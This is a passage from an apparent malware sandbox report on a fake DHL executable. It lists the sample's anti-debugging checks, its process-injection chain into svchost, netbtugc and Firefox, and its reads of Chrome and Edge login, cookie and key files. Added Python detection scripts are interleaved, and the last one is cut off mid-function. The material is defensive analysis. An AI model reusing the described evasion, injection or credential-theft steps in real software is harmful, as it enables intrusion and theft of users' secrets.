Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C2A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C2A124 SetUnhandledExceptionFilter
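The `mov eax, dword ptr fs:[00000030h]` rows above are reads of the Process Environment Block through the fs segment; the usual follow-up is a read of `PEB.BeingDebugged` at offset 2, which is how the IsDebuggerPresent check looks when inlined. The scanner below is an added example, not Joe Sandbox code, that finds these loads in raw 32-bit x86 bytes and classifies the instruction that consumes the pointer. It also handles the indirect form (load the TEB from fs:[18h], then read `TEB.ProcessEnvironmentBlock` at +0x30) that the direct-pattern rows do not show. The sample bytes are constructed for the example, not taken from the analysed binary.

```python
"""Flag PEB/TEB loads through the fs segment in raw 32-bit x86 code.

Added example (not Joe Sandbox code). Input is a byte string of code; the
scanner looks for the encodings of "mov r32, dword ptr fs:[0x30]" (PEB) and
"mov r32, dword ptr fs:[0x18]" (TEB self pointer) and classifies what the
following instruction does with the loaded pointer.
"""
import re

# ModRM byte of "mov r32, [disp32]" (mod=00, rm=101) for each destination register.
_DISP32_MODRM = {0x05: "eax", 0x0D: "ecx", 0x15: "edx", 0x1D: "ebx",
                 0x25: "esp", 0x2D: "ebp", 0x35: "esi", 0x3D: "edi"}
_REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]  # index = reg/rm field value

# 64 A1 <disp32>          mov eax, fs:[disp32]   (short moffs form, eax only)
# 64 8B <modrm> <disp32>  mov r32, fs:[disp32]
_FS_LOAD = re.compile(rb"\x64(?:\xA1|\x8B(.))([\x18\x30])\x00\x00\x00", re.DOTALL)


def find_peb_accesses(code: bytes) -> list:
    """Return one dict per fs:[0x30] / fs:[0x18] load: offset, register, kind, note."""
    hits = []
    for m in _FS_LOAD.finditer(code):
        modrm = m.group(1)
        if modrm is None:
            reg = "eax"
        elif modrm[0] in _DISP32_MODRM:
            reg = _DISP32_MODRM[modrm[0]]
        else:
            continue  # 8B with another addressing form: not a plain fs:[disp32] load
        i = _REGS.index(reg)
        nxt = code[m.end():m.end() + 4]  # bytes of the following instruction
        hit = {"offset": m.start(), "register": reg, "kind": "PEB", "note": None}
        if m.group(2) == b"\x30":
            # movzx r32, byte ptr [reg+2]  -> 0F B6 <mod=01,reg=any,rm=reg> 02
            # cmp   byte ptr [reg+2], 0    -> 80 <mod=01,/7,rm=reg> 02 00
            movzx = (len(nxt) == 4 and nxt[:2] == b"\x0F\xB6"
                     and (nxt[2] & 0xC7) == (0x40 | i) and nxt[3] == 0x02)
            cmp0 = nxt == bytes([0x80, 0x78 | i, 0x02, 0x00])
            if movzx or cmp0:
                hit["note"] = "PEB.BeingDebugged check"
        else:
            hit["kind"] = "TEB"
            # mov r32, [reg+0x30] -> 8B <mod=01,reg=dst,rm=reg> 30  (TEB.ProcessEnvironmentBlock)
            if len(nxt) >= 3 and nxt[0] == 0x8B and (nxt[1] & 0xC7) == (0x40 | i) and nxt[2] == 0x30:
                hit["kind"] = "TEB->PEB"
                hit["note"] = "PEB pointer moved into " + _REGS[(nxt[1] >> 3) & 7]
        hits.append(hit)
    return hits


# Constructed sample for this example, not bytes from the analysed binary.
SAMPLE_CODE = bytes.fromhex(
    "55 8B EC"               # push ebp; mov ebp, esp
    "64 A1 30 00 00 00"      # mov eax, fs:[0x30]           -> PEB
    "0F B6 40 02"            # movzx eax, byte ptr [eax+2]  -> PEB.BeingDebugged
    "85 C0"                  # test eax, eax
    "64 8B 35 30 00 00 00"   # mov esi, fs:[0x30]           -> PEB, no debugger check follows
    "8B 46 0C"               # mov eax, [esi+0x0C]          -> PEB.Ldr
    "64 8B 0D 18 00 00 00"   # mov ecx, fs:[0x18]           -> TEB
    "8B 51 30"               # mov edx, [ecx+0x30]          -> TEB.ProcessEnvironmentBlock
    "5D C3"                  # pop ebp; ret
)

if __name__ == "__main__":
    for h in find_peb_accesses(SAMPLE_CODE):
        print(f"+0x{h['offset']:04x} {h['kind']:8} via {h['register']}  {h['note'] or ''}")
```

Treat a hit as a triage pointer, not a verdict: the C runtime, the loader and any code that walks `PEB.Ldr` to resolve imports by hand read fs:[30h] too, which is why the report lists dozens of functions. The rows that matter most are the ones where the loaded pointer feeds a `BeingDebugged`, `NtGlobalFlag` (+0x68) or heap-flags check.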

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtProtectVirtualMemory: Direct from: 0x77542F9C
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtSetInformationProcess: Direct from: 0x77542C5C
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtOpenKeyEx: Direct from: 0x77542B9C
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtProtectVirtualMemory: Direct from: 0x77537B2E
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtCreateFile: Direct from: 0x77542FEC
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtOpenFile: Direct from: 0x77542DCC
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtQueryInformationToken: Direct from: 0x77542CAC
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtTerminateThread: Direct from: 0x77542FCC
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtDeviceIoControlFile: Direct from: 0x77542AEC
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtQueryValueKey: Direct from: 0x77542BEC
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtQueryVolumeInformationFile: Direct from: 0x77542F2C
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtOpenSection: Direct from: 0x77542E0C
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtAllocateVirtualMemory: Direct from: 0x775448EC
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtSetInformationThread: Direct from: 0x775363F9
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtQuerySystemInformation: Direct from: 0x775448CC
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtClose: Direct from: 0x77542B6C
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtReadVirtualMemory: Direct from: 0x77542E8C
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtCreateKey: Direct from: 0x77542C6C
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtSetInformationThread: Direct from: 0x77542B4C
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtQueryAttributesFile: Direct from: 0x77542E6C
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtOpenKeyEx: Direct from: 0x77543C9C
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtCreateUserProcess: Direct from: 0x7754371C
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtQueryInformationProcess: Direct from: 0x77542C26
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtResumeThread: Direct from: 0x77542FBC
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtWriteVirtualMemory: Direct from: 0x7754490C
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtDelayExecution: Direct from: 0x77542DDC
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtAllocateVirtualMemory: Direct from: 0x77542BFC
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtReadFile: Direct from: 0x77542ADC
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtQuerySystemInformation: Direct from: 0x77542DFC
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtResumeThread: Direct from: 0x775436AC
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpL
EAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtNotifyChangeKey: Direct from: 0x77543C2C
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtCreateMutant: Direct from: 0x775435CC
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtWriteVirtualMemory: Direct from: 0x77542E3C
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | NtMapViewOfSection: Direct from: 0x77542D1C
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe protection: read write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe | Thread register set: target process: 7840
Source: C:\Windows\SysWOW64\netbtugc.exe | Thread APC queued: target process: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2E49008
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C587B1 LogonUserW
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C03B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C64C53 mouse_event
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 30312052024.exe"
Source: C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C57CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C5874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: DHL 30312052024.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: FBboLdkGSWBoDSVHPM.exe, 00000003.00000000.1457949782.00000000015A1000.00000002.00000001.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000003.00000002.3801678252.00000000015A1000.00000002.00000001.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3803765268.0000000001801000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
Source: DHL 30312052024.exe, FBboLdkGSWBoDSVHPM.exe, 00000003.00000000.1457949782.00000000015A1000.00000002.00000001.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000003.00000002.3801678252.00000000015A1000.00000002.00000001.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3803765268.0000000001801000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: FBboLdkGSWBoDSVHPM.exe, 00000003.00000000.1457949782.00000000015A1000.00000002.00000001.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000003.00000002.3801678252.00000000015A1000.00000002.00000001.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3803765268.0000000001801000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: FBboLdkGSWBoDSVHPM.exe, 00000003.00000000.1457949782.00000000015A1000.00000002.00000001.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000003.00000002.3801678252.00000000015A1000.00000002.00000001.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3803765268.0000000001801000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C2862B cpuid
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C34E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C41E06 GetUserNameW
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C33F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
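The "Section loaded", "Thread register set", "Thread APC queued", "Memory written" and "Process created" rows above are the raw events of the injection chain, but the chain itself (sample -> svchost.exe -> dropped executable -> netbtugc.exe -> firefox.exe, with netbtugc.exe also injecting back into the dropped executable) only becomes visible once the rows are joined on source and target. The script below is an added example, not Joe Sandbox code: it rebuilds the chain from lines in the shape shown above (the "Source: ... | ..." separator and the line grammar are assumptions for this example, not a Joe Sandbox export format), records which technique was used on each edge, and enumerates the chains without looping on the netbtugc.exe <-> FBboLdkGSWBoDSVHPM.exe back-edge. The "Thread register set" row names its target only by PID, so it is reported separately rather than guessed.

```python
"""Rebuild the injection chain from sandbox behaviour lines.

Added example (not Joe Sandbox code). SAMPLE_EVENTS is constructed from the
report rows above with "Source: ... | ..." as separator; that line grammar is
an assumption for this example, not a Joe Sandbox export format.
"""
import ntpath
import re

DROPPED = (r"C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX"
           r"\FBboLdkGSWBoDSVHPM.exe")

SAMPLE_EVENTS = [
    r"Source: C:\Users\user\Desktop\DHL 30312052024.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write",
    rf"Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: {DROPPED} protection: execute and read and write",
    r"Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write",
    rf"Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: {DROPPED} protection: read write",
    rf"Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: {DROPPED} protection: execute and read and write",
    r"Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write",
    r"Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write",
    r"Source: C:\Windows\SysWOW64\netbtugc.exe | Thread register set: target process: 7840",
    rf"Source: C:\Windows\SysWOW64\netbtugc.exe | Thread APC queued: target process: {DROPPED}",
    r"Source: C:\Users\user\Desktop\DHL 30312052024.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2E49008",
    r'Source: C:\Users\user\Desktop\DHL 30312052024.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 30312052024.exe"',
    rf'Source: {DROPPED} | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"',
    r'Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"',
]

_LINE = re.compile(r"^Source: (?P<src>.+?) \| (?P<rest>.+)$")
_ACTIONS = [  # (pattern over the part after the separator, technique label)
    (re.compile(r"^Section loaded: NULL target: (?P<target>.+?) protection: (?P<prot>.+)$"), "section mapped ({prot})"),
    (re.compile(r"^Thread APC queued: target process: (?P<target>.+)$"), "APC queued"),
    (re.compile(r"^Memory written: (?P<target>.+?) base: "), "memory written"),
    (re.compile(r'^Process created: (?P<target>.+?) "'), "process created"),
    (re.compile(r"^Thread register set: target process: (?P<pid>\d+)$"), "thread context set"),
]


def build_injection_graph(lines):
    """Return ({(source, target): {techniques}}, [(source, technique, pid)]) for the given lines."""
    edges, unresolved = {}, []
    for line in lines:
        m = _LINE.match(line.strip())
        if not m:
            continue
        src = ntpath.basename(m.group("src"))
        for pattern, label in _ACTIONS:
            a = pattern.match(m.group("rest"))
            if not a:
                continue
            fields = a.groupdict()
            if "pid" in fields:
                # Target named only by PID: leave it for the process tree instead of guessing.
                unresolved.append((src, label, int(fields["pid"])))
            else:
                tgt = ntpath.basename(fields["target"])
                edges.setdefault((src, tgt), set()).add(label.format(**fields))
            break
    return edges, unresolved


def injection_chains(edges, root):
    """Enumerate simple paths from root; a back-edge to a process already on the path is skipped, not followed."""
    children = {}
    for src, tgt in edges:
        children.setdefault(src, []).append(tgt)
    chains = []

    def walk(path):
        nxt = [t for t in children.get(path[-1], []) if t not in path]
        if not nxt:
            chains.append(path)
            return
        for t in nxt:
            walk(path + [t])

    walk([root])
    return chains


if __name__ == "__main__":
    edges, unresolved = build_injection_graph(SAMPLE_EVENTS)
    for chain in injection_chains(edges, "DHL 30312052024.exe"):
        print(" -> ".join(chain))
    for (src, tgt), techniques in edges.items():
        print(f"{src} -> {tgt}: {', '.join(sorted(techniques))}")
    print("unresolved:", unresolved)
```

The per-edge technique sets are the useful output for a detection engineer: a read-write mapping followed by an execute-read-write mapping of the same target plus a queued APC is the signature of the injection used here, and it is a far more stable indicator than the random directory and file names the dropper generates.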

            Stealing of Sensitive Information

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.1535088491.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3799070452.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3800835213.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3803911358.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3807715876.0000000005620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1535865703.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3803937140.0000000004B20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1535411168.0000000003880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: DHL 30312052024.exe | Binary or memory string: WIN_81
Source: DHL 30312052024.exe | Binary or memory string: WIN_XP
Source: DHL 30312052024.exe | Binary or memory string: WIN_XPe
Source: DHL 30312052024.exe | Binary or memory string: WIN_VISTA
Source: DHL 30312052024.exe | Binary or memory string: WIN_7
Source: DHL 30312052024.exe | Binary or memory string: WIN_8
Source: DHL 30312052024.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
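The "File opened" and "Key opened" rows above are what the two "Tries to steal" signatures are built from: a process that is neither Chrome nor Edge reads `Local State` (which carries the browser's DPAPI-wrapped AES key) together with `Login Data`, `Cookies` and `Web Data` (the stores encrypted with that key), and it opens the Outlook MAPI profile key where account settings are kept. The script below is an added example, not Joe Sandbox code, of the corresponding detection logic over host telemetry: it groups credential-store accesses per (process, application) and rates a finding higher when the key container and an encrypted store are read by the same foreign process, since that combination is decryptable offline. The event layout, the process allow-list and the severity rule are assumptions for the example; the events are constructed from the rows above.

```python
"""Flag credential-store access by processes that are not the owning application.

Added example (not Joe Sandbox code). Events are constructed from the
"File opened" / "Key opened" rows above; the event dict layout, the browser
process names and the severity rule are assumptions for this example.
"""
import re
from collections import defaultdict

BROWSER_PROCESSES = {"chrome.exe", "msedge.exe", "firefox.exe"}

# Chromium profile files a stealer needs: Local State carries the DPAPI-wrapped AES key,
# Login Data / Cookies / Web Data hold the blobs encrypted with that key.
_BROWSER_STORE = re.compile(
    r"\\(?P<browser>google\\chrome|microsoft\\edge)\\user data\\.*?\\(?P<store>login data|cookies|web data|local state)$",
    re.IGNORECASE,
)
# Outlook (MAPI) profiles, where account settings and protected passwords are kept.
_OUTLOOK_PROFILES = re.compile(
    r"^HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\",
    re.IGNORECASE,
)


def find_credential_access(events):
    """Group store accesses per (process, application) and rate them."""
    touched = defaultdict(set)
    for ev in events:
        proc = ev["process"].lower()
        if proc in BROWSER_PROCESSES:
            continue  # a browser reading its own profile is normal
        if ev["op"] == "file_open":
            m = _BROWSER_STORE.search(ev["path"])
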